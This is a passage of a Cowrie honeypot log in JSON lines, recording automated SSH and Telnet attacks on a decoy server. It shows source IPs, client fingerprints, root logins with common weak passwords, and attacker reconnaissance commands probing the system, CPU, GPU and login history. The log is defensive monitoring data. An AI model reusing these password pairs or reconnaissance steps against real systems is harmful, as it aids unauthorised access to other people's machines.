\t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.387073Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.387810Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.388846Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.390193Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.391084Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.391901Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.393025Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.393526Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.393999Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.394470Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.395176Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:43:06.395721Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:43:07.717435Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:07.718400Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.session.closed","duration":"13.8","message":"Connection lost after 13.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:07.720109Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":57253,"dst_ip":"1.2.3.4","dst_port":23,"session":"a46aba5b78d9","protocol":"telnet","message":"New connection: 123.31.39.100:57253 (1.2.3.4:23) [session: a46aba5b78d9]","sensor":"my-vps","timestamp":"2025-08-28T08:43:08.985783Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52796,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4aefdbbc612","protocol":"ssh","message":"New connection: 185.93.89.7:52796 (1.2.3.4:22) [session: f4aefdbbc612]","sensor":"my-vps","timestamp":"2025-08-28T08:43:11.077052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:11.077748Z","src_ip":"185.93.89.7","session":"f4aefdbbc612"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:43:11.095489Z","src_ip":"185.93.89.7","session":"f4aefdbbc612"}
{"eventid":"cowrie.login.success","username":"root","password":"Index@123","message":"login attempt [root/Index@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:11.137739Z","src_ip":"185.93.89.7","session":"f4aefdbbc612"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:11.156668Z","src_ip":"185.93.89.7","session":"f4aefdbbc612"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45262,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c42acc301d6","protocol":"ssh","message":"New connection: 51.79.164.132:45262 (1.2.3.4:22) [session: 3c42acc301d6]","sensor":"my-vps","timestamp":"2025-08-28T08:43:14.502264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:14.584837Z","src_ip":"51.79.164.132","session":"3c42acc301d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:43:14.892613Z","src_ip":"51.79.164.132","session":"3c42acc301d6"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:15.299942Z","src_ip":"139.19.117.131","session":"b5ccef79f73e"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:16.536766Z","src_ip":"51.79.164.132","session":"3c42acc301d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:43:17.370832Z","src_ip":"51.79.164.132","session":"3c42acc301d6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:43:17.371544Z","src_ip":"51.79.164.132","session":"3c42acc301d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:17.939029Z","src_ip":"51.79.164.132","session":"3c42acc301d6"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:17.940329Z","src_ip":"51.79.164.132","session":"3c42acc301d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48038,"dst_ip":"1.2.3.4","dst_port":23,"session":"d1186c2c10a2","protocol":"telnet","message":"New connection: 212.227.125.160:48038 (1.2.3.4:23) [session: d1186c2c10a2]","sensor":"my-vps","timestamp":"2025-08-28T08:43:22.772579Z"}
{"eventid":"cowrie.session.closed","duration":1.5273170471191406,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:24.299834Z","src_ip":"212.227.125.160","session":"d1186c2c10a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48048,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f998d57ea5b","protocol":"telnet","message":"New connection: 212.227.125.160:48048 (1.2.3.4:23) [session: 9f998d57ea5b]","sensor":"my-vps","timestamp":"2025-08-28T08:43:24.341018Z"}
{"eventid":"cowrie.session.closed","duration":1.32871413230896,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:25.669647Z","src_ip":"212.227.125.160","session":"9f998d57ea5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59456,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed3960196693","protocol":"telnet","message":"New connection: 212.227.125.160:59456 (1.2.3.4:23) [session: ed3960196693]","sensor":"my-vps","timestamp":"2025-08-28T08:43:25.709583Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:27.387048Z","src_ip":"212.227.125.160","session":"ed3960196693"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:43:27.838116Z","src_ip":"212.227.125.160","session":"ed3960196693"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65150,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b4a94a1fb7a","protocol":"ssh","message":"New connection: 217.72.205.35:65150 (1.2.3.4:22) [session: 6b4a94a1fb7a]","sensor":"my-vps","timestamp":"2025-08-28T08:43:28.009810Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:28.011012Z","src_ip":"217.72.205.35","session":"6b4a94a1fb7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:29.135831Z","src_ip":"212.227.125.160","session":"ed3960196693"}
{"eventid":"cowrie.session.closed","duration":3.4302868843078613,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:29.139790Z","src_ip":"212.227.125.160","session":"ed3960196693"}
{"eventid":"cowrie.session.closed","duration":31.018741607666016,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:33.360156Z","src_ip":"212.227.125.160","session":"a92207451c12"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58904,"dst_ip":"1.2.3.4","dst_port":22,"session":"91280cf769b5","protocol":"ssh","message":"New connection: 51.79.164.132:58904 (1.2.3.4:22) [session: 91280cf769b5]","sensor":"my-vps","timestamp":"2025-08-28T08:43:41.156152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:41.424549Z","src_ip":"51.79.164.132","session":"91280cf769b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:43:41.474565Z","src_ip":"51.79.164.132","session":"91280cf769b5"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:43.609864Z","src_ip":"51.79.164.132","session":"91280cf769b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:43:44.768558Z","src_ip":"51.79.164.132","session":"91280cf769b5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:43:44.769614Z","src_ip":"51.79.164.132","session":"91280cf769b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:44.964973Z","src_ip":"51.79.164.132","session":"91280cf769b5"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:44.966154Z","src_ip":"51.79.164.132","session":"91280cf769b5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":59550,"dst_ip":"1.2.3.4","dst_port":22,"session":"595c886ef5d1","protocol":"ssh","message":"New connection: 185.93.89.7:59550 (1.2.3.4:22) [session: 595c886ef5d1]","sensor":"my-vps","timestamp":"2025-08-28T08:43:46.698995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:46.699873Z","src_ip":"185.93.89.7","session":"595c886ef5d1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:43:46.717466Z","src_ip":"185.93.89.7","session":"595c886ef5d1"}
{"eventid":"cowrie.login.success","username":"root","password":"index1234","message":"login attempt [root/index1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:46.755998Z","src_ip":"185.93.89.7","session":"595c886ef5d1"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:46.774874Z","src_ip":"185.93.89.7","session":"595c886ef5d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44150,"dst_ip":"1.2.3.4","dst_port":22,"session":"02d26c424600","protocol":"ssh","message":"New connection: 212.227.125.160:44150 (1.2.3.4:22) [session: 02d26c424600]","sensor":"my-vps","timestamp":"2025-08-28T08:43:50.469923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:51.657391Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:43:51.659007Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:54.405268Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.session.closed","duration":46.18679475784302,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:55.172509Z","src_ip":"123.31.39.100","session":"a46aba5b78d9"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":59440,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb7d3fdf9e04","protocol":"ssh","message":"New connection: 185.93.89.7:59440 (1.2.3.4:22) [session: bb7d3fdf9e04]","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.367859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.368721Z","src_ip":"185.93.89.7","session":"bb7d3fdf9e04"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.386579Z","src_ip":"185.93.89.7","session":"bb7d3fdf9e04"}
{"eventid":"cowrie.login.success","username":"root","password":"Index1234","message":"login attempt [root/Index1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.427175Z","src_ip":"185.93.89.7","session":"bb7d3fdf9e04"}
